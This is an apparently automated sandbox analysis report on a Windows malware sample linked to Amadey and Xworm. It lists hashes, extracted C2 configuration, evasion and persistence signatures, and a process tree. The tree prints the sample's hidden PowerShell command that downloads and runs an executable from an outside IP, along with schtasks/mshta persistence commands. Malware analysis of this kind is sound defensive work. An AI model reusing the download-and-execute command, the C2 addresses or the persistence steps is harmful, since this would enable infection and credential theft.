Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04/03/2025, 09:30
Static task
static1
Behavioral task
behavioral1
Sample
ef59bfc4e53fa990607868d76f1a9a93.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ef59bfc4e53fa990607868d76f1a9a93.exe
Resource
win10v2004-20250217-en
General
-
Target
ef59bfc4e53fa990607868d76f1a9a93.exe
-
Size
938KB
-
MD5
ef59bfc4e53fa990607868d76f1a9a93
-
SHA1
07a2dff253bc24e4683898621cd5a9c01af59ea3
-
SHA256
e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35
-
SHA512
31fc8c697e3eedc23c2251b95b34fd24f5d58d9dab5cdb9197d7890497c3aad430f15bf4a02d9c6bf39fdf473a1fd49b40700e36951ba6ee18523374191d1664
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0xu:VTvC/MTQYxsWR7a0x
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey family
-
Detect Xworm Payload 5 IoCs
resource yara_rule behavioral1/memory/1344-244-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/1344-243-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/1344-235-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/1344-240-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm behavioral1/memory/1344-237-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JqGBbm7.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1692 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1692 powershell.exe -
Downloads MZ/PE file 11 IoCs
flow pid Process 7 2392 rapes.exe 7 2392 rapes.exe 7 2392 rapes.exe 7 2392 rapes.exe 7 2392 rapes.exe 7 2392 rapes.exe 7 2392 rapes.exe 7 2392 rapes.exe 7 2392 rapes.exe 4 1692 powershell.exe 16 2068 bPDDW9F.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JqGBbm7.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe d0HNrLB.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe d0HNrLB.exe -
Executes dropped EXE 23 IoCs
pid Process 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 2392 rapes.exe 760 z3SJkC5.exe 2508 z3SJkC5.exe 1652 WiseTurbo.exe 808 JqGBbm7.exe 1484 3Mv6i65.exe 2248 3Mv6i65.exe 1212 Process not Found 2852 khykuQw.exe 1500 zY9sqWs.exe 2068 bPDDW9F.exe 1712 d0HNrLB.exe 924 d0HNrLB.exe 1644 d0HNrLB.exe 1344 d0HNrLB.exe 3012 JCFx2xj.exe 2976 d0HNrLB.exe 1488 d0HNrLB.exe 2576 7UlMpzX.exe 2900 XYo6sKWkqy3rJ6nBdN.exe 2024 VirtDdKyrBYna1.iso 2124 BXxKvLN.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Wine JqGBbm7.exe -
Loads dropped DLL 54 IoCs
pid Process 1692 powershell.exe 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 2392 rapes.exe 760 z3SJkC5.exe 2508 z3SJkC5.exe 2508 z3SJkC5.exe 696 WerFault.exe 696 WerFault.exe 696 WerFault.exe 696 WerFault.exe 696 WerFault.exe 2392 rapes.exe 2392 rapes.exe 1448 WerFault.exe 1448 WerFault.exe 1448 WerFault.exe 2392 rapes.exe 1484 3Mv6i65.exe 2248 3Mv6i65.exe 2392 rapes.exe 2392 rapes.exe 2272 WerFault.exe 2272 WerFault.exe 2272 WerFault.exe 2272 WerFault.exe 2272 WerFault.exe 2392 rapes.exe 2392 rapes.exe 2392 rapes.exe 2392 rapes.exe 2392 rapes.exe 1712 d0HNrLB.exe 1712 d0HNrLB.exe 1712 d0HNrLB.exe 1292 WerFault.exe 1292 WerFault.exe 1292 WerFault.exe 1292 WerFault.exe 1292 WerFault.exe 2472 WerFault.exe 2472 WerFault.exe 2472 WerFault.exe 2392 rapes.exe 2424 WerFault.exe 2424 WerFault.exe 2424 WerFault.exe 2424 WerFault.exe 2424 WerFault.exe 2392 rapes.exe 2576 7UlMpzX.exe 2900 XYo6sKWkqy3rJ6nBdN.exe 2024 VirtDdKyrBYna1.iso 2024 VirtDdKyrBYna1.iso 2392 rapes.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Windows\CurrentVersion\Run\d0HNrLB = "C:\\Users\\Admin\\AppData\\Roaming\\d0HNrLB.exe" d0HNrLB.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 2392 rapes.exe 808 JqGBbm7.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1712 set thread context of 1344 1712 d0HNrLB.exe 58 PID 2976 set thread context of 1488 2976 d0HNrLB.exe 66 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log z3SJkC5.exe File created C:\Windows\Tasks\rapes.job TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0006000000019c57-108.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
pid pid_target Process procid_target 696 2508 WerFault.exe 41 1448 808 WerFault.exe 44 2272 2852 WerFault.exe 50 1292 1712 WerFault.exe 55 2472 1500 WerFault.exe 52 2424 2976 WerFault.exe 65 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JCFx2xj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JqGBbm7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef59bfc4e53fa990607868d76f1a9a93.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language khykuQw.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2516 schtasks.exe 1728 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1692 powershell.exe 1692 powershell.exe 1692 powershell.exe 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 2392 rapes.exe 808 JqGBbm7.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 1712 d0HNrLB.exe Token: SeDebugPrivilege 1344 d0HNrLB.exe Token: SeDebugPrivilege 2976 d0HNrLB.exe Token: SeDebugPrivilege 1488 d0HNrLB.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 2480 ef59bfc4e53fa990607868d76f1a9a93.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2480 wrote to memory of 2320 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 31 PID 2480 wrote to memory of 2320 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 31 PID 2480 wrote to memory of 2320 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 31 PID 2480 wrote to memory of 2320 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 31 PID 2480 wrote to memory of 2460 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 32 PID 2480 wrote to memory of 2460 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 32 PID 2480 wrote to memory of 2460 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 32 PID 2480 wrote to memory of 2460 2480 ef59bfc4e53fa990607868d76f1a9a93.exe 32 PID 2320 wrote to memory of 2516 2320 cmd.exe 34 PID 2320 wrote to memory of 2516 2320 cmd.exe 34 PID 2320 wrote to memory of 2516 2320 cmd.exe 34 PID 2320 wrote to memory of 2516 2320 cmd.exe 34 PID 2460 wrote to memory of 1692 2460 mshta.exe 35 PID 2460 wrote to memory of 1692 2460 mshta.exe 35 PID 2460 wrote to memory of 1692 2460 mshta.exe 35 PID 2460 wrote to memory of 1692 2460 mshta.exe 35 PID 1692 wrote to memory of 2676 1692 powershell.exe 37 PID 1692 wrote to memory of 2676 1692 powershell.exe 37 PID 1692 wrote to memory of 2676 1692 powershell.exe 37 PID 1692 wrote to memory of 2676 1692 powershell.exe 37 PID 2676 wrote to memory of 2392 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 38 PID 2676 wrote to memory of 2392 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 38 PID 2676 wrote to memory of 2392 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 38 PID 2676 wrote to memory of 2392 2676 TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE 38 PID 2392 wrote to memory of 760 2392 rapes.exe 40 PID 2392 wrote to memory of 760 2392 rapes.exe 40 PID 2392 wrote to memory of 760 2392 rapes.exe 40 PID 2392 wrote to memory of 760 2392 rapes.exe 40 PID 760 wrote to memory of 2508 760 z3SJkC5.exe 41 PID 760 wrote to memory of 2508 760 z3SJkC5.exe 41 PID 760 wrote to memory of 2508 760 z3SJkC5.exe 41 PID 760 wrote to memory of 2508 760 z3SJkC5.exe 41 PID 2508 wrote to memory of 1652 2508 z3SJkC5.exe 42 PID 2508 wrote to memory of 1652 2508 z3SJkC5.exe 42 PID 2508 wrote to memory of 1652 2508 z3SJkC5.exe 42 PID 2508 wrote to memory of 1652 2508 z3SJkC5.exe 42 PID 2508 wrote to memory of 696 2508 z3SJkC5.exe 43 PID 2508 wrote to memory of 696 2508 z3SJkC5.exe 43 PID 2508 wrote to memory of 696 2508 z3SJkC5.exe 43 PID 2508 wrote to memory of 696 2508 z3SJkC5.exe 43 PID 2392 wrote to memory of 808 2392 rapes.exe 44 PID 2392 wrote to memory of 808 2392 rapes.exe 44 PID 2392 wrote to memory of 808 2392 rapes.exe 44 PID 2392 wrote to memory of 808 2392 rapes.exe 44 PID 808 wrote to memory of 1448 808 JqGBbm7.exe 46 PID 808 wrote to memory of 1448 808 JqGBbm7.exe 46 PID 808 wrote to memory of 1448 808 JqGBbm7.exe 46 PID 808 wrote to memory of 1448 808 JqGBbm7.exe 46 PID 2392 wrote to memory of 1484 2392 rapes.exe 47 PID 2392 wrote to memory of 1484 2392 rapes.exe 47 PID 2392 wrote to memory of 1484 2392 rapes.exe 47 PID 2392 wrote to memory of 1484 2392 rapes.exe 47 PID 1484 wrote to memory of 2248 1484 3Mv6i65.exe 48 PID 1484 wrote to memory of 2248 1484 3Mv6i65.exe 48 PID 1484 wrote to memory of 2248 1484 3Mv6i65.exe 48 PID 2392 wrote to memory of 2852 2392 rapes.exe 50 PID 2392 wrote to memory of 2852 2392 rapes.exe 50 PID 2392 wrote to memory of 2852 2392 rapes.exe 50 PID 2392 wrote to memory of 2852 2392 rapes.exe 50 PID 2852 wrote to memory of 2272 2852 khykuQw.exe 51 PID 2852 wrote to memory of 2272 2852 khykuQw.exe 51 PID 2852 wrote to memory of 2272 2852 khykuQw.exe 51 PID 2852 wrote to memory of 2272 2852 khykuQw.exe 51 PID 2392 wrote to memory of 1500 2392 rapes.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ef59bfc4e53fa990607868d76f1a9a93.exe"C:\Users\Admin\AppData\Local\Temp\ef59bfc4e53fa990607868d76f1a9a93.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn TsW0omaPkFW /tr "mshta C:\Users\Admin\AppData\Local\Temp\bfMw5ODvU.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn TsW0omaPkFW /tr "mshta C:\Users\Admin\AppData\Local\Temp\bfMw5ODvU.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2516
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\bfMw5ODvU.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Users\Admin\AppData\Local\TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE"C:\Users\Admin\AppData\Local\TempIMGCUNBKQO5DRFYGWKIBLRPQMNQD06WX.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2392 -
C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Windows\TEMP\{FA29FC6E-BEE8-4FB2-B46C-E210C693D9F8}\.cr\z3SJkC5.exe"C:\Windows\TEMP\{FA29FC6E-BEE8-4FB2-B46C-E210C693D9F8}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=2127⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\TEMP\{A8665593-E689-4264-82E5-8BFB5C17C2AF}\.ba\WiseTurbo.exeC:\Windows\TEMP\{A8665593-E689-4264-82E5-8BFB5C17C2AF}\.ba\WiseTurbo.exe8⤵
- Executes dropped EXE
PID:1652
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2508 -s 2088⤵
- Loads dropped DLL
- Program crash
PID:696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 808 -s 12047⤵
- Loads dropped DLL
- Program crash
PID:1448
-
-
-
C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2248
-
-
-
C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe"C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 8607⤵
- Loads dropped DLL
- Program crash
PID:2272
-
-
-
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1500 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 10447⤵
- Loads dropped DLL
- Program crash
PID:2472
-
-
-
C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:2068
-
-
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1712 -
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"7⤵
- Executes dropped EXE
PID:924
-
-
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"7⤵
- Executes dropped EXE
PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"7⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1344 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1728
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1712 -s 5247⤵
- Loads dropped DLL
- Program crash
PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe"C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2576 -
C:\Users\Admin\AppData\Local\.WindowTasks\XYo6sKWkqy3rJ6nBdN.exe
- Executes dropped EXE
- Loads dropped DLL
PID:2900 -
C:\Users\Admin\AppData\Local\VirtualStore\VirtDdKyrBYna1.iso
- Executes dropped EXE
- Loads dropped DLL
PID:2024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"6⤵
- Executes dropped EXE
PID:2124
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7AFDC667-CC12-4F6D-9A8B-AEE014510C83} S-1-5-21-2872745919-2748461613-2989606286-1000:CCJBVTGQ\Admin:Interactive:[1]1⤵PID:1568
-
C:\Users\Admin\AppData\Roaming\d0HNrLB.exeC:\Users\Admin\AppData\Roaming\d0HNrLB.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2976 -
C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 5083⤵
- Loads dropped DLL
- Program crash
PID:2424
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.8MB
MD5001d7acad697c62d8a2bd742c4955c26
SHA1840216756261f1369511b1fd112576b3543508f7
SHA256de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb
-
Filesize
2.9MB
MD530c1a6337089e68b975438caebc8f497
SHA12cf2324672cf72b9bc1869633f3bf6904bb61011
SHA256db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017
SHA512be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484
-
Filesize
7.1MB
MD5360e9aa39065352478da372c3c3b9b43
SHA1ca3d4bf6898f9771917650462eeb3571d02f5cf0
SHA256da7f6e4ab38830bf7da4384c246f8e374f0ff6a667af15540dc5b04a50a8d21e
SHA51204218cb5c3ff3002c02616dcf4b698621e2d5adc7a6bc6a1a02ea80d3e7f57635b1956f2604dee74dfc09ddf935b3c324b1cc0faff858b003597e75e69fa3bfe
-
Filesize
7.6MB
MD5accdbd5044408c82c19c977829713e4f
SHA1070a001ac12139cc1238017d795a2b43ac52770d
SHA256dfa2ab0714c9f234b63fd1295ce468bd247465701a90b8a9ab9eb3d6d032d258
SHA51234fe4ec1307e7d45080b6e0fb093eb8f1d43fb71a3e3411e32a5798f9cacc69ea1b82d56fcf9e503dd22c51e9af92fde7c149ac5882af4daab5c3cb906cdeb85
-
Filesize
361KB
MD52bb133c52b30e2b6b3608fdc5e7d7a22
SHA1fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA51273229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f
-
Filesize
1.3MB
MD5cde0f4bf8c4605529175bbb5e86c6bad
SHA18194071706458c456a021e8e17b0a63ba3b54b44
SHA256989ab0b506d60a468a8ab919dd973cae0f00072d60615d9b0243825e4b4a4e7e
SHA512265a84c26b56abdd0548503eea7b1ce76b6661ce874e7ef0235dad6d424b568ac104adf5324ee164924b67d4865222e5bc4567ea4ce67b39f08215ad301697ea
-
Filesize
277KB
MD5d1458dc39b290683cefbb01cc5b0991a
SHA1e9749971be9d943cb2a62e2be5eb442161876ec6
SHA256dc7d690adb8ea5ab1a9b1f65fc3a62b35d9ae4c57a7806ccb226b825f1465f2d
SHA512f90bc037576ee1205fa260d5b6b05c95f930025bc40f541b92f39b845b8e9a90a59ec18ef0be1ab5cf7bb74ed6a6222fc1a882df894ba8e1e722d671aef37e35
-
Filesize
12.4MB
MD57ff72f21d83d3abdc706781fb3224111
SHA13bfbe059b8e491bde4919fb29afa84d4ea1c0fa8
SHA2560c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea
